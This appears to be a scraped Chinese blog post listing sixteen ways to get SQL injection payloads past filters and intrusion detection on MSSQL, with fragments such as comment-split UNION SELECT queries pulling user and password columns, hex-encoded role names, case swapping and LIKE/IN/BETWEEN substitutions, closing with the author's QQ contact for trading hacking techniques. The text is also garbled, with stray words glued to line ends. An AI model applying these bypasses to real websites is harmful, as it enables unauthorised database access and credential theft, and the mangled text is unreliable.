繞過防注入的幾種方法

一、運用編碼技術繞過sql


如URLEncode編碼,ASCII編碼繞過。例如or 1=1即%6f%72%20%31%3d%31,而Test也能夠爲CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。工具

二、經過空格繞過post


如兩個空格代替一個空格,用Tab代替空格等,或者刪除全部空格,如
or swords =‘swords,因爲mssql的鬆散性,咱們能夠把or swords 之間的空格去掉,並不影響運行。編碼

三、運用字符串判斷代替3d


用經典的or 1=1判斷繞過,如or swords =swords,這個方法就是網上在討論的。code

四、經過類型轉換修飾符N繞過server


能夠說這是一個不錯的想法,他除了能在某種程度上繞過限制,並且還有別的做用,你們本身好好想一想吧。關於利用,如or swords = N swords ,大寫的N告訴mssql server 字符串做爲nvarchar類型,它起到類型轉換的做用,並不影響注射語句自己,可是能夠避過基於知識的模式匹配IDS。字符串

五、經過+號拆解字符串繞過get


效果值得考證,但畢竟是一種方法。如or swords =‘sw + ords ;EXEC(‘IN + SERT INTO + ….. )io

六、經過LIKE繞過


之前怎麼就沒想到呢?如orswords LIKE sw!!!顯然能夠很輕鬆的繞過「=」「>」的限制……

七、經過IN繞過


與上面的LIKE的思路差很少,如or swords IN (swords)

八、經過BETWEEN繞過


如or swords BETWEEN rw AND tw

九、經過>或者<繞過
or swords > sw
or swords < tw
or 1<3
……

十、運用註釋語句繞過


用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

十一、用HEX繞過,通常的IDS都沒法檢測出來
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)

十二、大小寫互換繞過


select 能夠寫成 SelEct
union 能夠寫成 UnIoN

1三、多種編碼組合繞過


經常使用的有BASE6四、ASC、SQL、HEX、URL編碼

1四、利用中轉工具繞過


能夠利用刺蝟的中轉工具來繞過 

1五、利用特殊字符填充繞過


這些特殊字符,會被解釋成空格,方式和經過空格繞過同樣的,通常用來繞過第三方防火牆軟件

1六、改變攻擊方式

若是get提交實在沒法繞過,能夠嘗試改變攻擊方式。如;post注入、尋找子站、旁站……等,若有疑問能夠隨時聯繫我QQ814360954哦,我很樂意和你們交流黑客技術。

相關文章
相關標籤/搜索